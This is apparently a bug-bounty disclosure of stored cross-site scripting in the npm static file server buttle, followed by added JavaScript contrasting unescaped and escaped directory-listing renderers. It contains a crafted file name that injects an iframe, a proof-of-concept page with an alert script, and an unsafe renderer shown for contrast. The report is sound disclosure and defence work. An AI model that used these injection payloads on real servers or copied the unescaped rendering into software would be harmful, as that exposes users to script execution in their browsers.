I would like to report HTML Injection in the buttle module.
Due to a lack of filename sanitization, it is possible to inject a malicious iframe
tag via a filename and execute arbitrary JavaScript code.
module name: buttle
version: 0.2.0
npm page: https://www.npmjs.com/package/buttle
Simple static file (+ markdown) server.
Stats:
N/A, estimated ~20-40 downloads/week
When buttle displays a directory index in the browser, it uses the directory.js middleware from the connect module to create the HTML output. Because the methods used to escape user output in this middleware are not sufficient (it's actually quite an outdated version of connect), it is possible to inject an iframe tag with its src attribute set to an arbitrary HTML file, which can contain any executable JavaScript code.
install buttle:
$ npm i buttle
create a file with the following name: "><iframe src="malware_frame.html">
create a malware_frame.html file with the following content:
<html>
<head>
<meta charset="utf8" />
<title>Frame embeded with malware :P</title>
</head>
<body>
<p>iframe element with malicious code</p>
<script>
alert('Uh oh, I am bad, bad malware!!!')
</script>
</body>
</html>
$ ./node_modules/buttle/bin/buttle -p 8080
Listening on port 8080
http://localhost:8080
You see JavaScript from malware_frame.html executed immediately:
{F279830}
Probably updating all dependencies is a good solution.
I hope my report will help to keep Node.js ecosystem and its users safe :)
Regards,
Rafal ‘bl4de’ Janicki
An attacker is able to execute arbitrary JavaScript code in the user's browser.
The hacker selected the Cross-site Scripting (XSS) - Stored weakness. This vulnerability type requires contextual information from the hacker. They provided the following answers:
Verified: Yes
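
The missing output escaping described in this report, as an added example (not code from the report, buttle or connect): a hypothetical directory-index renderer written first with raw interpolation and then with per-context encoding, run over constructed file names that include the one from the reproduction steps. All function names here are assumptions made for illustration.

```javascript
// Added example: hypothetical directory-index renderers.
// This is NOT the code of buttle or of connect's directory.js middleware.

// Escape the five characters that can change HTML text or attribute context.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Unsafe: the file name is interpolated raw into attributes and element text,
// so a name containing `">` closes the attribute and the tag.
function renderEntryUnsafe(name) {
  return '<li><a href="' + name + '" title="' + name + '">' + name + '</a></li>';
}

// Safe: percent-encode the name for the URL, then HTML-escape every value
// for the HTML context it lands in.
function renderEntrySafe(name) {
  const href = escapeHtml(encodeURIComponent(name));
  const label = escapeHtml(name);
  return '<li><a href="' + href + '" title="' + label + '">' + label + '</a></li>';
}

// Build the listing with whichever entry renderer is passed in.
function renderIndex(names, renderEntry) {
  return '<ul>' + names.map(renderEntry).join('') + '</ul>';
}

// Regression check: a directory listing should never emit these elements.
function containsInjectedTag(html) {
  return /<\s*(iframe|script)\b/i.test(html);
}

// Constructed sample directory; the second name is the one from the report.
const files = ['README.md', '"><iframe src="malware_frame.html">', 'malware_frame.html'];

console.log('unsafe listing injects a tag:',
  containsInjectedTag(renderIndex(files, renderEntryUnsafe)));
console.log('safe listing injects a tag:',
  containsInjectedTag(renderIndex(files, renderEntrySafe)));
console.log(renderIndex(files, renderEntrySafe));
```

A check like `containsInjectedTag` can be kept as a regression test for any listing renderer, with hostile file names as fixtures.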